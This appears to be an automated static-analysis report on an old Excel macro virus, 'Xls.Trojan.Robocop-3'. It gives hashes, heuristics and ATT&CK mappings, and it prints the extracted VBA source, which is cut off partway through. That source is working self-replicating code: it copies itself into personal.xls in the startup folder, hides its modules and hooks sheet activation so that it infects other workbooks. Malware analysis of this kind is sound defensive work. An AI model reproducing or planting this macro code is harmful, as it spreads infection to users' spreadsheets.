Xls.Trojan.Robocop-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 ba3c66db56f708d9…

MALICIOUS

Office (OLE)

23.5 KB Created: 1997-05-29 17:16:31 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: f005126e1684b0f7a3db63a409154b98 SHA-1: 3beab63499428413376ade8c3ecd67dd362a3af7 SHA-256: ba3c66db56f708d9de0667f7857665f4dd1dc92eae227e82bf452c3cf51f204b
160 Risk Score

Malware Insights

Xls.Trojan.Robocop-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This Excel document contains VBA macros, including Auto_Open and Auto_Close, which are indicative of malicious intent. The script attempts to copy its macros to the 'personal.xls' workbook, likely to establish persistence. The ClamAV detection name 'Xls.Trojan.Robocop-3' further supports the malicious classification.

Heuristics 4

  • ClamAV: Xls.Trojan.Robocop-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Robocop-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5284 bytes
SHA-256: d4726bfddcf5f02cdd272582de766ea04bd9ef4e360b3336499d99933888ae7e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"

Attribute VB_Name = "ROBO"



'
' Auto_Open Makro
' Makro am 30.12.1996 von Unbekannter Benutzer aufgezeichnet
'
'
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim v%, p%
    
    gp = 0
    vp = 0
   
    Application.ScreenUpdating = False
    For x = 1 To Application.Workbooks.Count
        If Application.Workbooks(x).Name = "personal.xls" Then
            gp = 1
            For y = 1 To Application.Workbooks("personal.xls").Modules.Count
            If Application.Workbooks("personal.xls").Modules(y).Name = "ROBO" Then
                vp = 1
            End If
        Next
        
        If vp = 0 Then
            Windows("personal.xls").Visible = True
            Set a = Application.ActiveWorkbook
            Application.Workbooks(a.Name).Modules("ROBO").Copy after:=Application.Workbooks("personal.xls").Modules(1)
            Application.Workbooks(a.Name).Modules("COP").Copy after:=Application.Workbooks("personal.xls").Modules(1)
            
            Sheets("COP").Select
            ActiveWindow.SelectedSheets.Visible = False
            
            Sheets("ROBO").Select
            ActiveWindow.SelectedSheets.Visible = False
            
            Windows("personal.xls").Visible = False
            Application.OnSheetActivate = ActiveWorkbook.Name & "!COP.ROBOCOP"
            Application.Workbooks("personal.xls").Save
        End If
        End If
    Next
        If gp = 0 Then
        Set a = Application.ActiveWorkbook
        Application.Workbooks(a.Name).SaveCopyAs Application.StartupPath + "\personal.xls"
        Application.Workbooks.Open (Application.StartupPath + "\personal.xls")
        Windows("personal.xls").Visible = False
        Application.Workbooks("personal.xls").Save
        End If
    Application.ScreenUpdating = True
    
'nice harmless Payload.

d = Day(v)
m = Month(p)
If d = 1 And m = 3 Then
    Selection.RowHeight = 100
    Selection.ColumnWidth = 255
    Range("A3").Select
    With Selection.Font
        .Name = "Imprint MT Shadow"
        .Size = 24
        .Strikethrough = False
        .Superscript = False
        .Subscript = False
        .OutlineFont = False
        .Shadow = False
        .Underline = xlNone
        .ColorIndex = xlAutomatic
    End With
    Range("A3").Select
    ActiveCell.FormulaR1C1 = "ROBOCOP Nightmare Joker [SLAM]"
    With ActiveCell.Characters(Start:=1, Length:=8).Font
        .Name = "Imprint MT Shadow"
        .FontStyle = "Standard"
        .Size = 48
        .Strikethrough = False
        .Superscript = False
        .Subscript = False
        .OutlineFont = False
        .Shadow = False
        .Underline = xlNone
        .ColorIndex = xlAutomatic
    End With
    With ActiveCell.Characters(Start:=9, Length:=22).Font
        .Name = "Imprint MT Shadow"
        .FontStyle = "Standard"
        .Size = 20
        .Strikethrough = False
        .Superscript = False
        .Subscript = False
        .OutlineFont = False
        .Shadow = False
        .Underline = xlNone
        .ColorIndex = xlAutomatic
    End With
    Range("A2").Select
Else
    '...
End If

Application.OnSheetActivate = Workbooks("personal.xls").Name & "!COP.ROBOCOP"
    
End Sub


Attribute VB_Name = "Module2"

Attribute VB_Name = "COP"



'
' Auto_Close Makro
' Makro am 30.12.1996 von Unbekannter Benutzer aufgezeichnet
'
'
Sub ROBOCOP()
Attribute ROBOCOP.VB_Description = "Makro am 30.12.1996 von Unbekannter Benutzer aufgezeichnet"
Attribute ROBOCOP.VB_ProcData.VB_Invoke_Func = " \n0"
    gp = 0
    vp = 0
    
    Set a = Application.ActiveWorkbook
    
    Application.ScreenUpdating = False
    For x = 1 To Application.Workbooks.Count
        If Application.Workbooks(x).Name = a.Name Then
            gp = 1
            For y = 1 To Application.Workbooks(a.Name).Modules.Count
            If Application.Workbooks(a.Name).Modules(y).Name = "ROBO" Then
                vp = 1
            End If
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.